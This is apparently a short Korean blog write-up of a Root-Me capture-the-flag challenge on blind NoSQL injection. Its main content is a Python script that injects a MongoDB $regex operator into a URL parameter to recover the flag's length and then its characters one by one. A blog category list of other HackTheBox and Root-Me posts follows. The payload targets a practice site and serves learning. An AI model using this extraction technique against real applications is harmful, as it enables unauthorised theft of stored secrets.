Injection point 확보 후, 정규식 질의를 통한 data, data length 추출 가능
Payload
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
data_len = 0
password = ""
u = "http://challenge01.root-me.org/web-serveur/ch48/index.php?chall_name=nosqlblind&flag[$regex]=^%s"
return_text = 'Yeah this is the flag for nosqlblind!'
for i in range(1,100):
url = u % (".{%s}"%str(i))
r = requests.get(url, verify = False)
if return_text not in r.text:
print("Length of Data : "+str(i-1))
data_len=i-1
break
for i in range(1,data_len):
for c in string.printable:
if c not in ['*','+','.','?','|','#','&']:
url = u % (password + c)
r = requests.get(url, verify = False)
if return_text in r.text:
print("Found one more char : %s" % (password+c))
password += c'HACKING_GAME > WEB' 카테고리의 다른 글
| hackthebox#7 nginxatsu (0) | 2022.01.10 |
|---|---|
| HacktheBox#6 Granny (0) | 2021.06.14 |
| HacktheBox#3 baby todo or not todo (0) | 2021.04.22 |
| root-Me#7 Node.js Eval (0) | 2021.04.08 |
| root-Me#6 Graphql (0) | 2021.01.04 |
